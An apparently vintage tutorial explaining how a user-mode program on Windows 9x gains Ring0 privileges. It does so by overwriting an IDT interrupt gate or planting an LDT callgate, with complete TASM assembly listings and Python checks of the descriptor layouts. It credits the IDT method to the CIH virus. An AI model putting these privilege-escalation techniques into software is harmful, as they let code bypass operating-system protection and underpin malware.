This article gives a short overview of two undocumented ways to go Ring0 in
Windows 9x, exploiting the fact that none of the important system tables in
Win9x are on pages which are protected from low-privilege access.
A basic knowledge of Protected Mode and OS internals is required; refer to
your Assembly Book for that :-) The techniques presented here are in no way a
good/clean way to get to a higher privilege level, but since they require only
a minimal coding effort, they are sometimes more desirable to implement than a
full-fledged VxD.
1. Introduction
Under all modern Operating Systems, the CPU runs in protected mode, taking
advantage of the special features of this mode to implement virtual memory,
multitasking etc. To manage access to system-critical resources (and thus to
provide stability), an OS needs privilege levels, so that a program can't
just switch out of protected mode etc. These privilege levels are represented
on the x86 (by x86 I mean the 386 and later) CPU by 'Rings', with
Ring0 being the most privileged and Ring3 being the least privileged level.
Theoretically, the x86 is capable of 4 privilege levels, but Win32 uses only
two of them, Ring0 as 'Kernel Mode' and Ring3 as 'User Mode'.
Since Ring0 is not needed by 99% of all applications, the only documented way
to use Ring0 routines in Win9x is through VxDs. But VxDs, while being the only
stable and recommended way, are big and take a lot of work to write, so in a
few specialized situations other ways to go Ring0 are useful.
The CPU itself handles privilege level transitions in two ways: Through
Exceptions/Interrupts and through Callgates. Callgates can be put in the LDT or
GDT, Interrupt-Gates are found in the IDT.
We'll take advantage of the fact that these tables can be freely written to
from Ring3 in Win9x (NOT IN NT !).
2. The IDT method
If an exception occurs (or is triggered), the CPU looks up the corresponding
descriptor in the IDT. This descriptor gives the CPU the segment and address
to transfer control to. An Interrupt Gate descriptor looks like this:
                                      D D
  1.Offset (16-31)                  P P P 0 1 1 1 0 0 0 0 R R R R R   +4
                                      L L
 --------------------------------- ---------------------------------
  2.Segment Selector                3.Offset (0-15)                    0
 --------------------------------- ---------------------------------
DPL == Two bits containing the Descriptor Privilege Level
P == Present bit
R == Reserved bits
The first word (Nr.3) contains the lower word of the 32-bit address of the
Exception Handler. The word at +6 contains the high-order word. The word at +2
is the selector of the segment in which the handler resides.
The word at +4 identifies the descriptor as Interrupt Gate, contains its
privilege and the present bit. Now, to use the IDT to go Ring0, we'll create a
new Interrupt Gate which points to our Ring0 procedure, save an old one and
replace it with ours.
Then we'll trigger that exception. Instead of passing control to Windows' own
handler, the CPU will now execute our Ring0 code. As soon as we're done, we'll
restore the old Interrupt Gate.
In Win9x, the selector 0028h always points to a Ring0-Code Segment, which spans
the entire 4 GB address range. We'll use this as our Segment selector.
The DPL has to be 3, as we're calling from Ring3, and the present bit must be
set. So the word at +4 will be 1110111000000000b => EE00h. These values can
be hardcoded into our program, so we just have to add the offset of our Ring0
procedure to the descriptor. As exception, you should preferably use one that
rarely occurs, so do not use the page fault (exception 14, i.e. int 0Eh) ;-)
I'll use int 9h, since it is (to my knowledge) not used on 486+.
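To double-check the arithmetic above without touching a real IDT, here is a
small Python sketch (not part of the TASM source) that packs the four words
of such a gate. The name make_interrupt_gate and the handler address
00401234h are made up for illustration; only the selector 0028h and the
EE00h word come from the text.

```python
import struct

def make_interrupt_gate(handler_offset, selector=0x0028, dpl=3, present=True):
    """Pack a 32-bit Interrupt Gate into its 8-byte in-memory form."""
    # Word at +4: P in bit 15, DPL in bits 14-13, then 0 1 1 1 0 in
    # bits 12-8; the low byte (three zero bits plus reserved bits) stays 0.
    access = (int(present) << 15) | ((dpl & 3) << 13) | (0b01110 << 8)
    low = handler_offset & 0xFFFF            # word at +0
    high = (handler_offset >> 16) & 0xFFFF   # word at +6
    # Little-endian words at +0, +2, +4, +6.
    return struct.pack("<HHHH", low, selector, access, high)

# 0x00401234 is a hypothetical address for Ring0Proc.
gate = make_interrupt_gate(0x00401234)
print(gate.hex())
```

With DPL 3 and the present bit set, the third word comes out as EE00h, the
value that gets hardcoded into OurGate.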
Example code follows (to be compiled with TASM 5):
-------------------------------- bite here -----------------------------------
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL

EXTRN ExitProcess : PROC

.data
IDTR        df 0            ; This will receive the contents of the IDTR
                            ; register
SavedGate   dq 0            ; We save the gate we replace in here
OurGate     dw 0            ; Offset low-order word
            dw 028h         ; Segment selector
            dw 0EE00h       ; P=1, DPL=3, Interrupt Gate
            dw 0            ; Offset high-order word

.code
Start:
        mov     eax, offset Ring0Proc
        mov     [OurGate], ax           ; Put the offset words
        shr     eax, 16                 ; into our descriptor
        mov     [OurGate+6], ax

        sidt    fword ptr IDTR
        mov     ebx, dword ptr [IDTR+2] ; load IDT Base Address
        add     ebx, 8*9                ; Address of int9 descriptor in ebx

        mov     edi, offset SavedGate
        mov     esi, ebx
        movsd                           ; Save the old descriptor
        movsd                           ; into SavedGate

        mov     edi, ebx
        mov     esi, offset OurGate
        movsd                           ; Replace the old handler
        movsd                           ; with our new one

        int     9h                      ; Trigger the exception, thus
                                        ; passing control to our Ring0
                                        ; procedure

        mov     edi, ebx
        mov     esi, offset SavedGate
        movsd                           ; Restore the old handler
        movsd

        call    ExitProcess, LARGE -1

Ring0Proc PROC
                                        ; Your Ring0 code goes here
        iretd                           ; Return from the gate to Ring3
Ring0Proc ENDP

end Start
-------------------------------- bite here -----------------------------------
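The address arithmetic in the listing (SIDT stores a 16-bit limit followed by
a 32-bit base, and every gate is 8 bytes wide) can be sketched in Python as
follows. This is only an illustration: the helper names and the six sample
bytes are made up, they are not values read from a real machine.

```python
import struct

def parse_table_register(raw6):
    """Split the 6 bytes written by SIDT (or SGDT) into (limit, base)."""
    limit, base = struct.unpack("<HI", raw6)   # 16-bit limit, 32-bit base
    return limit, base

def gate_address(idt_base, vector):
    """Each IDT entry is 8 bytes, so vector n sits at base + 8*n."""
    return idt_base + 8 * vector

# Hypothetical SIDT result: limit 07FFh, base C000A000h.
raw = bytes.fromhex("ff0700a000c0")
limit, base = parse_table_register(raw)
print(hex(limit), hex(base), hex(gate_address(base, 9)))
```

This mirrors the two instructions "mov ebx, dword ptr [IDTR+2]" and
"add ebx, 8*9" from the example.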
3. The LDT Method
Another possibility of executing Ring0 code is to install a so-called callgate
in either the GDT or LDT. Under Win9x it is a little bit easier to use the LDT,
since the first 16 descriptors in it are always empty, so I will only give
source for that method here.
A Callgate is similar to an Interrupt Gate and is used in order to transfer
control from a low-privileged segment to a high-privileged segment using a CALL
instruction.
The format of a callgate is:
                                      D D               D D D D D
  1.Offset (16-31)                  P P P 0 1 1 0 0 0 0 0 W W W W W   +4
                                      L L               C C C C C
 --------------------------------- ---------------------------------
  2.Segment Selector                3.Offset (0-15)                    0
 --------------------------------- ---------------------------------
P == Present bit
DPL == Descriptor Privilege Level
DWC == Dword Count, number of arguments copied to the ring0 stack
So all we have to do is to create such a callgate, write it into one of the
first 16 descriptors, then do a far call to that descriptor to execute our
Ring0 code.
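As a sanity check on the bit layout, the following Python sketch packs a
callgate and builds the selector needed for the far call. Nothing here talks
to the CPU; make_call_gate, make_selector and the target address 00401234h
are hypothetical names and values chosen for illustration.

```python
import struct

def make_call_gate(target_offset, selector=0x0028, dpl=3, dword_count=0):
    """Pack a 32-bit callgate into its 8-byte in-memory form."""
    # Word at +4: P (bit 15), DPL (bits 14-13), 0 1 1 0 0 (bits 12-8),
    # three zero bits, then the 5-bit Dword Count in bits 4-0.
    access = 0x8000 | ((dpl & 3) << 13) | (0b01100 << 8) | (dword_count & 0x1F)
    low = target_offset & 0xFFFF
    high = (target_offset >> 16) & 0xFFFF
    return struct.pack("<HHHH", low, selector, access, high)

def make_selector(index, in_ldt, rpl):
    """Selector = descriptor index * 8, table bit in bit 2, RPL in bits 1-0."""
    return (index << 3) | (int(in_ldt) << 2) | (rpl & 3)

gate = make_call_gate(0x00401234)          # made-up Ring0Proc address
sel = make_selector(1, in_ldt=True, rpl=3)  # first usable LDT descriptor
print(gate.hex(), hex(sel))
```

With DPL 3 and no stack arguments the word at +4 is EC00h, and descriptor 1
in the LDT at privilege level 3 gives the selector 000Fh.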
Example Code:
-------------------------------- bite here -----------------------------------
.386P
LOCALS
JUMPS
.MODEL FLAT, STDCALL

EXTRN ExitProcess : PROC

.data
GDTR        df 0            ; This will receive the contents of the GDTR
                            ; register
CallPtr     dd 00h          ; As we're using the first descriptor (8) and
            dw 0Fh          ; it's located in the LDT and the privilege level
                            ; is 3, our selector will be 000Fh.
                            ; That is because the low-order two bits of the
                            ; selector are the privilege level, and the 3rd
                            ; bit is set if the selector is in the LDT.
OurGate     dw 0            ; Offset low-order word
            dw 028h         ; Segment selector
            dw 0EC00h       ; P=1, DPL=3, Callgate, Dword Count 0
            dw 0            ; Offset high-order word

.code
Start:
        mov     eax, offset Ring0Proc
        mov     [OurGate], ax           ; Put the offset words
        shr     eax, 16                 ; into our descriptor
        mov     [OurGate+6], ax

        xor     eax, eax
        sgdt    fword ptr GDTR
        mov     ebx, dword ptr [GDTR+2] ; load GDT Base Address
        sldt    ax
        add     ebx, eax                ; Address of the LDT descriptor in
                                        ; ebx
        mov     al, [ebx+4]             ; Load the base address
        mov     ah, [ebx+7]             ; of the LDT itself into
        shl     eax, 16                 ; eax, refer to your pmode
        mov     ax, [ebx+2]             ; manual for details
        add     eax, 8                  ; Skip NULL Descriptor

        mov     edi, eax
        mov     esi, offset OurGate
        movsd                           ; Move our custom callgate
        movsd                           ; into the LDT

        call    fword ptr [CallPtr]     ; Execute the Ring0 Procedure

        xor     eax, eax                ; Clean up the LDT
        sub     edi, 8
        stosd
        stosd

        call    ExitProcess, LARGE -1

Ring0Proc PROC
                                        ; Your Ring0 code goes here
        retf                            ; Far return through the callgate
Ring0Proc ENDP

end Start
-------------------------------- bite here -----------------------------------
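The least obvious part of the listing is how the LDT base address is pieced
together from the LDT descriptor in the GDT. The Python sketch below does the
same thing on a byte string; the helper names, the fake GDT and the LDT
selector 0010h are invented for the example and do not reflect real Win9x
values.

```python
def descriptor_base(desc8):
    """Base bits 0-15 sit at +2/+3, bits 16-23 at +4, bits 24-31 at +7."""
    return desc8[2] | (desc8[3] << 8) | (desc8[4] << 16) | (desc8[7] << 24)

def ldt_slot_address(gdt_bytes, ldt_selector, slot):
    """Linear address of descriptor number `slot` inside the LDT."""
    offset = ldt_selector & 0xFFF8          # drop the table and RPL bits
    desc = gdt_bytes[offset:offset + 8]     # the LDT's descriptor in the GDT
    return descriptor_base(desc) + 8 * slot

# Fake GDT: two empty entries, then an LDT descriptor with base 805C5000h.
fake_gdt = bytes(16) + bytes.fromhex("ff0f00505c820080")
print(hex(ldt_slot_address(fake_gdt, 0x0010, 1)))
```

Slot 1 corresponds to the "add eax, 8" that skips the NULL descriptor, which
is also why the far pointer uses selector 000Fh.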
Well, that's all for now folks. The LDT method can easily be changed to use
the GDT instead, which would save a few bytes in case you have to optimize
heavily. Anyway, do use these methods with care: they will NOT run on NT and
are generally not exactly a clean or stable way to do these things.
Credits & Thanks
The IDT method is taken from the CIH virus & Stone's example source at
http://www.cracking.net.
The LDT method was done by me, but without IceMan's & The_Owl's help I would
still be stuck, so all credits go to them.